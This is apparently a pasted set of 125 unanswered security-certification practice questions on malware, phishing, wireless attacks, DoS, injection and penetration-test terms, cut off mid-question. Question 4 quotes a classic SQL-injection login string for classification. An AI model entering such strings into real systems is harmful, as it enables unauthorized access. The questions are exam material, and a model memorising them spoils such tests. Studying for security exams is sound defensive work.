· 7 years ago · Mar 01, 2019, 04:14 AM
11. John is analyzing strange behavior on computers in his network. He believes there is mal-
2ware on the machines. The symptoms include strange behavior that persists, even if he
3boots the machine to a Linux Live CD. What is the most likely cause?
4A. Ransomware
5B. Boot sector virus
6C. Rootkit
7D. Key logger
82. Ahmed is a sales manager with a major insurance company. He has received an email that
9is encouraging him to click on a link and fill out a survey. He is suspicious of the email,
10but it does mention a major insurance association, and that makes him think it might be
11legitimate. Which of the following best describes this attack?
12A. Phishing
13B. Social engineering
14C. Spear phishing
15D. Trojan horse
163. You are a security administrator for a medium-sized bank. You have discovered a piece of
17software on your bank’s database server that is not supposed to be there. It appears that
18the software will begin deleting database files if a specific employee is terminated. What
19best describes this?
20A. Worm
21B. Logic bomb
22C. Trojan horse
23D. Rootkit
244. You are responsible for incident response at Acme bank. The Acme bank website has been
25attacked. The attacker used the login screen, but rather than enter login credentials, he or
26she entered some odd text: ' or '1' = '1. What is the best description for this attack?
27A. Cross-site scripting
28B. Cross-site request forgery
29C. SQL injection
30D. ARP poisoning
315. Juanita is a network administrator for a small accounting firm. The users on her network
32are complaining of slow connectivity. When she examines the firewall logs, she observes a
33large number of half-open connections. What best describes this attack?
34A. DDoS
35B. SYN flood
36C. Buffer overflow
37D. ARP poisoning
386. Frank is deeply concerned about attacks to his company’s e-commerce server. He is parÂ
39ticularly worried about cross-site scripting and SQL injection. Which of the following
40would best defend against these two specific attacks?
41A. Encrypted web traffic
42B. Filtering user input
43C. A firewall
44D. An IDS
457. You are responsible for network security at Acme Company. Users have been reporting
46that personal data is being stolen when using the wireless network. They all insist they
47only connect to the corporate wireless access point (WAP). However, logs for the WAP
48show that these users have not connected to it. Which of the following could best explain
49this situation?
50A. Session hijacking
51B. Clickjacking
52C. Rogue access point
53D. Bluejacking
548. What type of attack depends on the attacker entering JavaScript into a text area that is
55intended for users to enter text that will be viewed by other users?
56A. SQL injection
57B. Clickjacking
58C. Cross-site scripting
59D. Bluejacking
609. A sales manager at your company is complaining about slow performance on his com-
61puter. When you thoroughly investigate the issue, you find spyware on his computer. He
62insists that the only thing he has downloaded recently was a freeware stock trading appli-
63cation. What would best explain this situation?
64A. Logic bomb
65B. Trojan horse
66C. Rootkit
67D. Macro virus
6810. Your company outsourced development of an accounting application to a local program-
69ming firm. After three months of using the product, one of your accountants accidently
70discovers a way to log in and bypass all security and authentication. What best describes
71this?
72A. Logic bomb
73B. Trojan horse
74C. Backdoor
75D. Rootkit
7611. Teresa is the security manager for a mid-sized insurance company. She receives a call
77from law enforcement, telling her that some computers on her network participated in a
78massive denial-of-service (DoS) attack. Teresa is certain that none of the employees at her
79company would be involved in a cybercrime. What would best explain this scenario?
80A. It is a result of social engineering.
81B. The machines all have backdoors.
82C. The machines are bots.
83D. The machines are infected with crypto-viruses.
8412. Mike is a network administrator with a small financial services company. He has received
85a popup window that states his files are now encrypted and he must pay .5 bitcoins to get
86them decrypted. He tries to check the files in question, but their extensions have changed,
87and he cannot open them. What best describes this situation?
88A. Mike’s machine has a rootkit.
89B. Mike’s machine has ransomware.
90C. Mike’s machine has a logic bomb.
91D. Mike’s machine has been the target of whaling.
9213. Terrance is examining logs for the company e-commerce web server. He discovers a num-
93ber of redirects that cannot be explained. After carefully examining the website, he finds
94some attacker performed a watering hole attack by placing JavaScript in the website and is
95redirecting users to a phishing website. Which of the following techniques would be best
96at preventing this in the future?
97A. An SPI firewall
98B. An active IDS/IPS
99C. Checking buffer boundaries
100D. Checking user input
10114. What type of attack is based on sending more data to a target variable than the data can
102actually hold?
103A. Bluesnarfing
104B. Buffer overflow
105C. Bluejacking
106D. DDoS
10715. You have been asked to test your company network for security issues. The specific test
108you are conducting involves primarily using automated and semiautomated tools to look
109for known vulnerabilities with the various systems on your network. Which of the follow-
110ing best describes this type of test?
111A. Vulnerability scan
112B. Penetration test
113C. Security audit
114D. Security test
11516. Jared discovers that attackers have breached his WiFi network. They have gained access
116via the wireless access point (WAP) administrative panel, and have logged on with the
117credentials the WAP shipped with. What best describes this issue?
118A. Default configuration
119B. Race conditions
120C. Failure to patch
121D. Weak encryption
12217. Joanne is concerned about social engineering. She is particularly concerned that this tech-
123nique could be used by an attacker to obtain information about the network, including
124possibly even passwords. What countermeasure would be most effective in combating
125social engineering?
126A. SPI firewall
127B. An IPS
128C. User training
129D. Strong policies
13018. You are responsible for incident response at a mid-sized bank. You have discovered that
131someone was able to successfully breach your network and steal data from your database
132server. All servers are configured to forward logs to a central logging server. However,
133when you examine that central log, there are no entries after 2:13 a.m. two days ago. You
134check the servers, and they are sending logs to the right server, but they are not getting
135there. Which of the following would be most likely to explain this?
136A. Your log server has a backdoor.
137B. Your log server has been hit with a buffer overflow attack.
138C. Your switches have been hit with ARP poisoning.
139D. Your IDS is malfunctioning and blocking log transmissions.
14019. Coleen is the web security administrator for an online auction website. A small number
141of users are complaining that when they visit the website and log in, they are told the ser-
142vice is down and to try again later. Coleen checks and she can visit the site without any
143problem, even from computers outside the network. She also checks the web server log
144and there is no record of those users ever connecting. Which of the following might best
145explain this?
146A. Typosquatting
147B. SQL injection
148C. Cross-site scripting
149D. Cross-site request forgery
15020. Mahmoud is responsible for managing security at a large university. He has just per-
151formed a threat analysis for the network, and based on past incidents and studies of
152similar networks, he has determined that the most prevalent threat to his network is
153low-skilled attackers who wish to breach the system, simply to prove they can or for
154some low-level crime, such as changing a grade. Which term best describes this type of
155attacker?
156A. Hacktivist
157B. Amateur
158C. Insider
159D. Script kiddie
16021. Which of the following best describes a collection of computers that have been compro-
161mised and are being controlled from one central point?
162A. Zombienet
163B. Botnet
164C. Nullnet
165D. Attacknet
16622. John is conducting a penetration test of a client’s network. He is currently gathering infor-
167mation from sources such as archive.org, netcraft.com, social media, and information
168websites. What best describes this stage?
169A. Active reconnaissance
170B. Passive reconnaissance
171C. Initial exploitation
172D. Pivot
17323. One of the salespeople in your company reports that his computer is behaving sluggishly.
174You check but don’t see any obvious malware. However, in his temp folder you find JPEGs
175that look like screenshots of his desktop. Which of the following is the most likely cause?
176A. He is stealing data from the company.
177B. There is a backdoor on his computer.
178C. There is spyware on his computer.
179D. He needs to update his Windows.
18024. What type of attack is based on entering fake entries into a target networks domain name
181server?
182A. DNS poisoning
183B. ARP poisoning
184C. Bluesnarfing
185D. Bluejacking
18625. Frank has been asked to conduct a penetration test of a small bookkeeping firm. For the
187test, he has only been given the company name, the domain name for their website, and
188the IP address of their gateway router. What best describes this type of test?
189A. White-box test
190B. External test
191C. Black-box test
192D. Threat test
19326. You work for a security company that performs penetration testing for clients. You are
194conducting a test of an e-commerce company. You discover that after compromising the
195web server, you can use the web server to launch a second attack into the company’s inter-
196nal network. What best describes this?
197A. Internal attack
198B. White-box testing
199C. Black-box testing
200D. A pivot
20127. While investigating a malware outbreak on your company network, you discover some-
202thing very odd. There is a file that has the same name as a Windows system DLL, and
203even has the same API interface, but handles input very differently, in a manner to help
204compromise the system, and it appears that applications have been attaching to this file,
205rather than the real system DLL. What best describes this?
206A. Shimming
207B. Trojan horse
208C. Backdoor
209D. Refactoring
21028. Your company has hired a penetration testing firm to test the network. For the test, you
211have given the company details on operating systems you use, applications you run, and
212network devices. What best describes this type of test?
213A. White-box test
214B. External test
215C. Black-box test
216D. Threat test
21729. Frank is a network administrator for a small college. He discovers that several machines
218on his network are infected with malware. That malware is sending a flood of packets to
219a target external to the network. What best describes this attack?
220A. SYN flood
221B. DDoS
222C. Botnet
223D. Backdoor
22430. John is a salesman for an automobile company. He recently downloaded a program
225from an unknown website, and now his client files have their file extensions changed,
226and he cannot open them. He has received a popup window that states his files are now
227encrypted and he must pay .5 bitcoins to get them decrypted. What has happened?
228A. His machine has a rootkit.
229B. His machine has a logic bomb.
230C. His machine has a boot sector virus.
231D. His machine has ransomware.
23231. When phishing attacks are so focused that they target a specific individual, they are called
233what?
234A. Spear phishing
235B. Targeted phishing
236C. Phishing
237D. Whaling
23832. You are concerned about a wide range of attacks that could affect your company’s web
239server. You have recently read about an attack wherein the attacker sends more data to the
240target than the target is expecting. If done properly, this could cause the target to crash.
241What would best prevent this type of attack?
242A. An SPI firewall
243B. An active IDS/IPS
244C. Checking buffer boundaries
245D. Checking user input
24633. You work for a large retail company that processes credit card purchases. You have been
247asked to test your company network for security issues. The specific test you are conduct-
248ing involves primarily checking policies, documentation, and past incident reports. Which
249of the following best describes this type of test?
250A. Vulnerability scan
251B. Penetration test
252C. Security audit
253D. Security test
25434. Maria is a salesperson with your company. After a recent sales trip, she discovers that
255many of her logins have been compromised. You carefully scan her laptop and cannot find
256any sign of any malware. You do notice that she had recently connected to a public WiFi
257at a coffee shop, and it is only since that connection that she noticed her logins had been
258compromised. What would most likely explain what has occurred?
259A. She connected to a rogue AP.
260B. She downloaded a Trojan horse.
261C. She downloaded spyware.
262D. She is the victim of a buffer overflow attack.
26335. You are the manager for network operations at your company. One of the accountants
264sees you in the hall and thanks you for your team keeping his antivirus software up to
265date. When you ask him what he means, he mentions that one of your staff, named Mike,
266called him and remotely connected to update the antivirus. You don’t have an employee
267named Mike. What has occurred?
268A. IP spoofing
269B. MAC spoofing
270C. Man-in-the-middle attack
271D. Social engineering
27236. You are a security administrator for a bank. You are very interested in detecting any
273breaches or even attempted breaches of your network, including those from internal per-
274sonnel. But you don’t want false positives to disrupt work. Which of the following devices
275would be the best choice in this scenario?
276A. IPS
277B. WAF
278C. SIEM
279D. IDS
28037. One of your users cannot recall the password for their laptop. You want to recover that
281password for them. You intend to use a tool/technique that is popular with hackers, and
282it consists of searching tables of precomputed hashes to recover the password. What best
283describes this?
284A. Rainbow table
285B. Backdoor
286C. Social engineering
287D. Dictionary attack
28838. You have noticed that when in a crowded area, you sometimes get a stream of unwanted
289text messages. The messages end when you leave the area. What describes this attack?
290A. Bluejacking
291B. Bluesnarfing
292C. Evil twin
293D. Rogue access point
29439. Someone has been rummaging through your company’s trash bins seeking to find docu-
295ments, diagrams, or other sensitive information that has been thrown out. What is this
296called?
297A. Dumpster diving
298B. Trash diving
299C. Social engineering
300D. Trash engineering
30140. You have noticed that when in a crowded area, data from your cell phone is stolen. Later
302investigation shows a Bluetooth connection to your phone, one that you cannot explain.
303What describes this attack?
304A. Bluejacking
305B. Bluesnarfing
306C. Evil twin
307D. RAT
30841. Louis is investigating a malware incident on one of the computers on his network. He
309has discovered unknown software that seems to be opening a port, allowing someone to
310remotely connect to the computer. This software seems to have been installed at the same
311time as a small shareware application. Which of the following best describes this malware?
312A. RAT
313B. Backdoor
314C. Logic bomb
315D. Rootkit
31642. This is a common security issue that is extremely hard to control in large environments.
317It occurs when a user has more computer rights, permissions, and privileges than what is
318required for the tasks the user needs to perform. What best describes this scenario?
319A. Excessive rights
320B. Excessive access
321C. Excessive permissions
322D. Excessive privileges
32343. Jared is responsible for network security at his company. He has discovered behavior on
324one computer that certainly appears to be a virus. He has even identified a file he thinks
325might be the virus. However, using three separate antivirus programs, he finds that none
326can detect the file. Which of the following is most likely to be occurring?
327A. The computer has a RAT.
328B. The computer has a zero-day exploit.
329C. The computer has a logic bomb.
330D. The computer has a rootkit.
33144. There are some computers on your network that use Windows XP. They have to stay on
332Windows XP due to a specific application they are running. That application won’t run on
333newer operating systems. What security concerns does this situation give you?
334A. No special concerns; this is normal.
335B. The machines cannot be patched; XP is no longer supported.
336C. The machines cannot coordinate with an SIEM since XP won’t support that.
337D. The machines are more vulnerable to DoS attacks.
33845. Farès has discovered that attackers have breached his wireless network. They seem to have
339used a brute-force attack on the WiFi-protected setup PIN to exploit the WAP and recover
340the WPA2 password. What is this attack called?
341A. Evil twin
342B. Rogue WAP
343C. IV attack
344D. WPS Attack
34546. Your wireless network has been breached. It appears the attacker modified a portion of
346data used with the stream cipher and utilized this to expose wirelessly encrypted data.
347What is this attack called?
348A. Evil twin
349B. Rogue WAP
350C. IV attack
351D. WPS Attack
35247. John is concerned about disgruntled employees stealing company documents and exfiltrat-
353ing them from the network. He is looking for a solution that will detect likely exfiltration
354and block it. What type of system is John looking for?
355A. IPS
356B. SIEM
357C. Honeypot
358D. Firewall
35948. Some users on your network use Acme Bank for their personal banking. Those users have
360all recently been the victim of an attack, wherein they visited a fake Acme Bank website
361and their logins were compromised. They all visited the bank website from your network,
362and all of them insist they typed in the correct URL. What is the most likely explanation
363for this situation?
364A. Trojan horse
365B. IP spoofing
366C. Clickjacking
367D. DNS poisoning
36849. Users are complaining that they cannot connect to the wireless network. You discover
369that the WAPs are being subjected to a wireless attack designed to block their WiFi signals.
370Which of the following is the best label for this attack?
371A. IV attack
372B. Jamming
373C. WPS attack
374D. Botnet
37550. What type of attack involves users clicking on something different on a website than what
376they intended to click on?
377A. Clickjacking
378B. Bluesnarfing
379C. Bluejacking
380D. Evil twin
38151. What type of attack exploits the trust that a website has for an authenticated user to
382attack that website by spoofing requests from the trusted user?
383A. Cross-site scripting
384B. Cross-site request forgery
385C. Bluejacking
386D. Evil twin
38752. John is a network administrator for Acme Company. He has discovered that someone
388has registered a domain name that is spelled just one letter different than his company’s
389domain. The website with the misspelled URL is a phishing site. What best describes this
390attack?
391A. Session hijacking
392B. Cross-site request forgery
393C. Typosquatting
394D. Clickjacking
39553. Frank has discovered that someone was able to get information from his smartphone
396using a Bluetooth connection. The attacker was able to get his contact list and some
397emails he had received. What is this type of attack called?
398A. Bluesnarfing
399B. Session hijacking
400C. Backdoor attack
401D. CSRF
40254. Juanita is a network administrator for Acme Company. Some users complain that they
403keep getting dropped from the network. When Juanita checks the logs for the wireless
404access point (WAP), she finds that a deauthentication packet has been sent to the WAP
405from the users’ IP addresses. What seems to be happening here?
406A. Problem with users’ WiFi configuration
407B. Disassociation attack
408C. Session hijacking
409D. Backdoor attack
41055. John has discovered that an attacker is trying to get network passwords by using software
411that attempts a number of passwords from a list of common passwords. What type of
412attack is this?
413A. Dictionary
414B. Rainbow table
415C. Brute force
416D. Session hijacking
41756. You are a network security administrator for a bank. You discover that an attacker has
418exploited a flaw in OpenSSL and forced some connections to move to a weak cipher suite
419version of TLS, which the attacker could breach. What type of attack was this?
420A. Disassociation attack
421B. Downgrade attack
422C. Session hijacking
423D. Brute force
42457. When an attacker tries to find an input value that will produce the same hash as a pass-
425word, what type of attack is this?
426A. Rainbow table
427B. Brute force
428C. Session hijacking
429D. Collision attack
43058. Farès is the network security administrator for a company that creates advanced routers
431and switches. He has discovered that his company’s networks have been subjected to a
432series of advanced attacks over a period of time. What best describes this attack?
433A. DDoS
434B. Brute force
435C. APT
436D. Disassociation attack
43759. You are responsible for incident response at Acme Company. One of your jobs is to
438attempt to attribute attacks to a specific type of attacker. Which of the following would
439not be one of the attributes you consider in attributing the attack?
440A. Level of sophistication
441B. Resources/funding
442C. Intent/motivation
443D. Amount of data stolen
44460. John is running an IDS on his network. Users sometimes report that the IDS flags legiti-
445mate traffic as an attack. What describes this?
446A. False positive
447B. False negative
448C. False trigger
449D. False flag
45061. You are performing a penetration test of your company’s network. As part of the test, you
451will be given a login with minimal access and will attempt to gain administrative access
452with this account. What is this called?
453A. Privilege escalation
454B. Session hijacking
455C. Root grabbing
456D. Climbing
45762. Mary has discovered that a web application used by her company does not always handle
458multithreading properly, particularly when multiple threads access the same variable.
459This could allow an attacker who discovered this vulnerability to exploit it and crash the
460server. What type of error has Mary discovered?
461A. Buffer overflow
462B. Logic bomb
463C. Race conditions
464D. Improper error handling
46563. An attacker is trying to get access to your network. He is sending users on your network
466a link to a freeware stock-monitoring program. However, that stock-monitoring program
467has attached to it software that will give the attacker access to any machine that it is
468installed on. What type of attack is this?
469A. Rootkit
470B. Trojan horse
471C. Spyware
472D. Boot sector virus
47364. Acme Company uses its own internal certificate server for all internal encryption.
474However, their certificate authority only publishes a CRL once per week. Does this
475pose a danger, and if so what?
476A. Yes, this means a revoked certificate could be used for up to seven days.
477B. No, this is standard for all certificate authorities.
478C. Yes, this means it would be easy to fake a certificate.
479D. No, since this is being used only internally.
48065. When a program has variables, especially arrays, and does not check the boundary values
481before inputting data, what attack is the program vulnerable to?
482A. XSS
483B. CRSF
484C. Buffer overflow
485D. Logic bomb
48666. Which of the following best describes malware that will execute some malicious activity
487when a particular condition is met (i.e., if condition is met, then execute)?
488A. Boot sector virus
489B. Logic bomb
490C. Buffer overflow
491D. Sparse infector virus
49267. Gerald is a network administrator for Acme Company. Users are reporting odd behavior
493on their computers. He believes this may be due to malware, but the behavior is different
494on different computers. What might best explain this?
495A. It is not malware, but hardware failure.
496B. It is a boot sector virus.
497C. It is a macro virus.
498D. It is a polymorphic virus.
49968. Teresa is a security officer at ACME Inc. She has discovered an attack where the attacker
500sent multiple broadcast messages to the network routers, spoofing an IP address of one of
501the network servers. This caused the network to send a flood of packets to that server and
502it is no longer responding. What is this attack called?
503A. Smurf attack
504B. DDoS attack
505C. TCP hijacking attack
506D. TCP SYN flood attack
50769. Which type of virus is able to alter its own code to avoid being detected by antivirus soft-
508ware?
509A. Boot sector
510B. Hoax
511C. Polymorphic
512D. Stealth
51370. Gerald is a network administrator for a small financial services company. Users are
514reporting odd behavior that appears to be caused by a virus on their machines. After iso-
515lating the machines that he believes are infected, Gerald analyzes them. He finds that all
516the infected machines received an email purporting to be from accounting, with an Excel
517spreadsheet, and the users opened the spreadsheet. What is the most likely issue on these
518machines?
519A. A macro virus
520B. A boot sector virus
521C. A Trojan horse
522D. A RAT
52371. Fred is on the incident response team for a major insurance company. His specialty is
524malware analysis. He is studying a file that is suspected of being a virus that infected the
525company network last month. The file seems to intermittently have bursts of malicious
526activity, interspersed with periods of being dormant. What best describes this malware?
527A. A macro virus
528B. A logic bomb
529C. A sparse infector virus
530D. A polymorphic virus
53172. What is the term used to describe a virus that can infect both program files and boot
532sectors?
533A. Polymorphic
534B. Multipartite
535C. Stealth
536D. Multiple encrypting
53773. Your company has hired an outside security firm to perform various tests of your net-
538work. During the vulnerability scan you will provide that company with logins for vari-
539ous systems (i.e., database server, application server, web server, etc.) to aid in their scan.
540What best describes this?
541A. A white-box test
542B. A gray-box test
543C. A privileged scan
544D. An authenticated user scan
54574. Which of the following is commonly used in a distributed denial of service (DDoS) attack?
546A. Phishing
547B. Adware
548C. Botnet
549D. Trojan
55075. You are investigating a recent breach at Acme Company. You discover that the attacker
551used an old account of someone no longer at the company. The account was still active.
552Which of the following best describes what caused this vulnerability to exist?
553A. Improperly configured accounts
554B. Untrained users
555C. Using default configuration
556D. Failure to patch systems
55776. Juan is responsible for incident response at a large financial institution. He discovers that
558the company WiFi has been breached. The attacker used the same login credentials that
559ship with the wireless access point (WAP). The attacker was able to use those credentials
56021
561to access the WAP administrative console and make changes. Which of the following best
562describes what caused this vulnerability to exist?
563A. Improperly configured accounts
564B. Untrained users
565C. Using default configuration
566D. Failure to patch systems
56777. Elizabeth is investigating a network breach at her company. She discovers a program that
568was able to execute code within the address space of another process by using the target
569process to load a specific library. What best describes this attack?
570A. Logic bomb
571B. Session hijacking
572C. Buffer overflow
573D. DLL injection
57478. Zackary is a malware investigator with a cybersecurity firm. He is investigating malware
575that is able to compromise a target program by finding null references in the target pro-
576gram and dereferencing them, causing an exception to be generated. What best describes
577this type of attack?
578A. DLL injection
579B. Buffer overflow
580C. Memory leak
581D. Pointer dereference
58279. Frank has just taken over as CIO of a mid-sized insurance company. One of the first
583things he does is order a thorough inventory of all network equipment. He discovers two
584routers that are not documented. He is concerned that if they are not documented, they
585might not be securely configured, tested, and safe. What best describes this situation?
586A. Poor user training
587B. System sprawl
588C. Failure to patch systems
589D. Default configuration
59080. What is the primary difference between an intrusive and a nonintrusive vulnerability
591scan?
592A. An intrusive scan is a penetration test.
593B. A nonintrusive scan is just a document check.
594C. An intrusive scan could potentially disrupt operations.
595D. A nonintrusive scan won’t find most vulnerabilities.
59681. Daryl is investigating a recent breach of his company’s web server. The attacker used
597sophisticated techniques and then defaced the website, leaving messages that were
598denouncing the company’s public policies. He and his team are trying to determine the
599type of actor who most likely committed the breach. Based on the information provided,
600who was the most likely threat actor?
601A. A script
602B. A nation-state
603C. Organized crime
604D. Hacktivists
60582. When investigating breaches and attempting to attribute them to specific threat actors,
606which of the following is not one of the indicators of an APT?
607A. Long-term access to the target
608B. Sophisticated attacks
609C. The attack comes from a foreign IP address.
610D. The attack is sustained over time.
61183. What type of attack uses a second wireless access point (WAP) that broadcasts the same
612SSID as a legitimate access point, in an attempt to get users to connect to the attacker’s
613WAP?
614A. Evil twin
615B. IP spoofing
616C. Trojan horse
617D. MAC spoofing
61884. You are investigating a breach of a large technical company. You discover that there have
619been several different attacks over a period of a year. The attacks were sustained, each
620lasting several weeks of continuous attack. The attacks were somewhat sophisticated and
621originated from a variety of IP addresses, but all the IP addresses are within your country.
622Which threat actor would you most suspect of being involved in this attack?
623A. Nation-state
624B. Hacktivist
625C. Script kiddie
626D. A lone highly skilled hacker
62785. Which of the following best describes a zero-day vulnerability?
628A. A vulnerability that has been known to the vendor for zero days
629B. A vulnerability that has not yet been breached
630C. A vulnerability that can be quickly exploited (i.e., in zero days)
631D. A vulnerability that will give the attacker brief access (i.e., zero days)
63286. You have discovered that there are entries in your network’s domain name server that
633point legitimate domains to unknown and potentially harmful IP addresses. What best
634describes this type of attack?
635A. A backdoor
636B. An APT
637C. DNS poisoning
638D. A Trojan horse
63987. What best describes an attack that attaches some malware to a legitimate program so that
640when the user installs the legitimate program, they inadvertently install the malware?
641A. Backdoor
642B. Trojan horse
643C. RAT
644D. Polymorphic virus
64588. Which of the following best describes software that will provide the attacker with remote
646access to the victim’s machine, but that is wrapped with a legitimate program in an
647attempt to trick the victim into installing it?
648A. RAT
649B. Backdoor
650C. Trojan horse
651D. Macro virus
65289. Which of the following is an attack that seeks to attack a website, based on the website’s
653trust of an authenticated user?
654A. XSS
655B. CSRF
656C. Buffer overflow
657D. RAT
65890. John is analyzing what he believes is a malware outbreak on his network. Many users
659report their machines are behaving strangely. The anomalous behavior seems to occur
660sporadically and John cannot find a pattern. What is the most likely cause?
661A. APT
662B. Boot sector virus
663C. Sparse infector virus
664D. Key logger
66591. Farès is the CISO of a bank. He has received an email that is encouraging him to click on
666a link and fill out a survey. Being security conscious, he normally does not click on links.
667However, this email calls him by name and claims to be a follow-up to a recent conference
668he attended. Which of the following best describes this attack?
669A. Clickjacking
670B. Social engineering
671C. Spear phishing
672D. Whaling
67392. You are responsible for technical support at your company. Users are all complaining of
674very slow Internet connectivity. When you examine the firewall, you find a large num-
675ber of incoming connections that are not completed, all packets coming from a single IP
676address. What best describes this attack?
677A. DDoS
678B. SYN flood
679C. Buffer overflow
680D. ARP poisoning
68193. An attacker is trying to get malformed queries sent to the backend database to circumvent
682the web page’s security. What type of attack depends on the attacker entering text into
683text boxes on a web page that is not normal text, but rather odd-looking commands that
684are designed to be inserted into database queries?
685A. SQL injection
686B. Clickjacking
687C. Cross-site scripting
688D. Bluejacking
68994. Tyrell is responsible for selecting cryptographic products for his company. The company
690wants to encrypt the drives of all laptops. The product they have selected uses 128-bit
691AES encryption for full disk encryption, and users select a password to decrypt the drive.
692What, if any, would be the major weakness in this system?
693A. None; this is a good system.
694B. The 128-bit AES key is too short.
695C. The passwords users select are the weak link.
696D. The AES algorithm is the problem; they should use DES.
69795. Valerie is responsible for security testing applications in her company. She has discovered
698that a web application, under certain conditions, can generate a memory leak. What, type
699of attack would this leave the application vulnerable to?
700A. DoS
701B. Backdoor
702C. SQL injection
703D. Buffer overflow
70496. When a multithreaded application does not properly handle various threads accessing a
705common value, what flaw is this?
706A. Memory leak
707B. Buffer overflow
708C. Integer overflow
709D. Race condition
71097. Acme Company is using smart cards that use near-field communication (NFC) rather than
711needing to be swiped. This is meant to make physical access to secure areas more secure.
712What vulnerability might this also create?
713A. Tailgating
714B. Eavesdropping
715C. IP spoofing
716D. Race conditions
71798. John is responsible for physical security at a large manufacturing plant. Employees all use
718a smart card in order to open the front door and enter the facility. Which of the following
719is a common way attackers would circumvent this system?
720A. Phishing
721B. Tailgating
722C. Spoofing the smart card
723D. RFID spoofing
72499. Which of the following is the term for an attack wherein malware inserts itself as a
725library, such as a DLL, between an application and the real system library the application
726is attempting to communicate with?
727A. Application spoofing
728B. Jamming
729C. Evil twin
730D. Shimming
731100. You are responsible for incident response at Acme Corporation. You have discovered that
732someone has been able to circumvent the Windows authentication process for a specific
733network application. It appears that the attacker took the stored hash of the password and
734sent it directly to the backend authentication service, bypassing the application. What type
735of attack is this?
736A. Hash spoofing
737B. Evil twin
738C. Shimming
739D. Pass the hash
740101. A user in your company reports that she received a call from someone claiming to be from
741the company technical support team. The caller stated that there was a virus spreading
742through the company and he needed immediate access to the employee’s computer to stop
743it from being infected. What social-engineering principles did the caller use to try to trick
744the employee?
745A. Urgency and intimidation
746B. Urgency and authority
747C. Authority and trust
748D. Intimidation and authority
749102. Ahmed has discovered that someone has manipulated tables in one of the company’s
750switches. The manipulation has changed the tables so that data destined for one specific
751MAC address will now be routed elsewhere. What type of attack is this?
752A. ARP poisoning
753B. DNS poisoning
754C. Man-in-the-middle
755D. Backdoor
756103. You are investigating incidents at Acme Corporation and have discovered malware on sev-
757eral machines. It appears that this malware infects system files in the Windows/System32/
758directory and also affects the boot sector. What type of malware is this?
759A. Multipartite
760B. Boot sector
761C. Macro virus
762D. Polymorphic virus
763104. What type of attack uses Bluetooth to access the data from a cell phone when in range?
764A. Phonejacking
765B. Bluejacking
766C. Bluesnarfing
767D. Evil twin
768105. An attacker is using a table of precomputed hashes in order to try to get a Windows pass-
769word. What type of technique is being used?
770A. Dictionary
771B. Brute force
772C. Pass the hash
773D. Rainbow table
774106. Carlos works in incident response for a mid-sized bank. Users inform him that internal
775network connections are fine, but connecting to the outside world is very slow. Carlos
776reviews logs on the external firewall and discovers tens of thousands of ICMP packets
777coming from a wide range of different IP addresses. What type of attack is occurring?
778A. Smurf
779B. DoS
780C. DDoS
781D. SYN flood
782107. What type of attack is it when the attacker attempts to get the victim’s communication to
783abandon a high-quality/secure mode in favor of a lower-quality/less secure mode?
784A. Downgrade
785B. Brute force
786C. Rainbow table
787D. Bluesnarfing
788108. What type of penetration test is being done when the tester is given extensive knowledge
789of the target network?
790A. White-box
791B. Full disclosure
792C. Black-box
793D. Red team
794109. Your company is instituting a new security awareness program. You are responsible for
795educating end users on a variety of threats, including social engineering. Which of the fol-
796lowing best defines social engineering?
797A. Illegal copying of software
798B. Gathering information from discarded manuals and printouts
799C. Using people skills to obtain proprietary information
800D. Phishing emails
801110. Which of the following attacks can be caused by a user being unaware of their physical
802surroundings?
803A. ARP poisoning
804B. Phishing
805C. Shoulder surfing
806D. Smurf attack
807111. Francine is a network administrator for Acme Corporation. She has noticed that one of
808the servers is now unreachable. After carefully reviewing various logs, she discovers that a
809large number of broadcast packets were sent to the network router, spoofing the server’s IP
810address. What type of attack is this?
811A. SYN flood
812B. ICMP flood
813C. Buffer overflow
814D. Smurf attack
815112. An attacker enters code into a text box on a website. That text box is used for product
816reviews. The attacker wants his code to execute the next time a visitor visits that page.
817What is this attack called?
818A. SQL injection
819B. Logic bomb
820C. Cross-site scripting
821D. Session hijacking
822113. A user is redirected to a different website when the user requests the DNS record
823www.xyz.com. Which of the following is this an example of?
824A. DNS poisoning
825B. DoS
826C. DNS caching
827D. Smurf attack
828114. Tom is the network administrator for a small accounting firm. As soon as he comes in to
829work, users report to him that they cannot connect to the network. After investigating,
830Tom discovers that none of the workstations can connect to the network and all have an
831IP address in the form of 169.254.x.x. What has occurred?
832A. Smurf attack
833B. Man-in-the-middle attack
834C. DDoS
835D. DHCP starvation
836115. Which of the following would most likely use a group of bots to stop a web server from
837accepting new requests?
838A. DoS
839B. DDoS
840C. Buffer overflow
841D. Trojan horse
842116. Which of the following would a former employee most likely plant on a server before leav-
843ing to cause disruption to the network?
844A. Worm
845B. Logic bomb
846C. Trojan
847D. Virus
848117. A SYN flood is a DoS attack in which an attacker deliberately violates the three-way
849handshake and opens a large number of half-open TCP connections. The signature of a
850SYN flood attack is:
851A. The source and destination address having the same value
852B. The source and destination port numbers having the same value
853C. A large number of SYN packets appearing on a network without the corresponding
854ACK packets
855D. A large number of SYN packets appearing on a network with the corresponding
856reply RST
857118. What does white-box testing mean?
858A. The tester has full knowledge of the environment.
859B. The tester has no knowledge of the environment.
860C. The tester has permission to access the system.
861D. The tester has no permission to access the system.
862119. Ahmed has been hired to perform a penetration test of Acme Corporation. He begins by
863looking at IP address ranges owned by the company and details of domain name registra-
864tion. He also visits social media and newsgroups to see if they contain any sensitive infor-
865mation or have any technical details online. Within the context of penetration-examining
866methodology, what phase is Ahmed conducting?
867A. Passive information gathering
868B. Active information gathering
869C. Initial exploitation
870D. Vulnerability scanning
871120. Mary works for a large insurance company, on their cybersecurity team. She is investigat-
872ing a recent incident and discovers that a server was breached using an authorized user’s
873account. After investigating the incident further, Mary believes that the authorized user
874logged on, and then someone else took over their session. What best describes this attack?
875A. Man-in-the-middle
876B. Session hijacking
877C. Backdoor
878D. Smurf attack
879121. Which of the following type of testing utilizes an automated process of proactively identi-
880fying vulnerabilities of the computing systems present on a network?
881A. Security audit
882B. Vulnerability scanning
883C. White-box test
884D. Black-box test
885122. What type of attack is an NFC most susceptible to?
886A. Eavesdropping
887B. Man-in-the-middle
888C. Buffer overflow
889D. Smurf attack
890123. John has been asked to do a penetration test of a company. He has been given general
891information but no details about the network. What kind of test is this?
892A. Gray-box
893B. White-box
894C. Partial
895D. Masked
896124. Under which type of attack does an attacker’s system appear to be the server to the real
897client and appear to be the client to the real server?
898A. Denial of service
899B. Replay
900C. Eavesdropping
901D. Man-in-the-middle
902125. You are a security administrator for Acme Corporation. You have discovered malware on
903some of your company’s machines. This malware seems to intercept calls from the web
904browser to libraries, and then manipulates the browser calls. What type of attack is this?
905A. Man-in-the-browser
906B. Man-in-the-middle
907C. Buffer overflow
